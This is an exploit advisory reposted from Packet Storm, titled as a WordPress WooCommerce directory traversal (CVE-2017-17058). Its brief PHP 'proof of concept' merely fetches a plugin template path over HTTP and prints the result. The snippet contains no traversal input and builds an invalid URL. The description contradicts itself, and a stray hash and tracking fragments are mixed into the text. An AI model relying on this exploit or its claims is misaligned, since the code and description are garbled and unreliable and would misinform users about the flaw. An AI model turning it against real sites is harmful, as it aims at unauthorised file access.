WordPress WooCommerce plugin versions 2.0 and 3.0 suffer from a directory traversal vulnerability.
ef9a9858c034e30ca756d4c222afd09c9ef7645557959e2a92d02f963b329590# Exploit Title: WordPress woocommerce directory traversal
# Date: 28-11-2017
# Software Link: https://wordpress.org/plugins/woocommerce/
# Exploit Author:fu2x2000
# Contact: fu2x2000@gmail.com
# Website:
# CVE:2017-17058
#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0
# Category: webapps
1. Description
Identifying woo commerce theme pluging properly sanitized against Directory
Traversal,even the latest version of WordPress with woocommerce can be
vulnerable.
2. Proof of Concept
$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
function file_get_contents_utf8($fn) {
$opts = array(
'http' => array(
'method'=>"GET",
'header'=>"Content-Type: text/html; charset=utf-8"
)
);
$wp = stream_context_create($opts);
$result = @file_get_contents($fn,false,$wp);
return $result;
}
/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
header("Content-Type: text/html; charset=utf-8");
$result = file_get_contents_utf8("http://".$woo);
echo $result;
Regards
Fu2x200
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed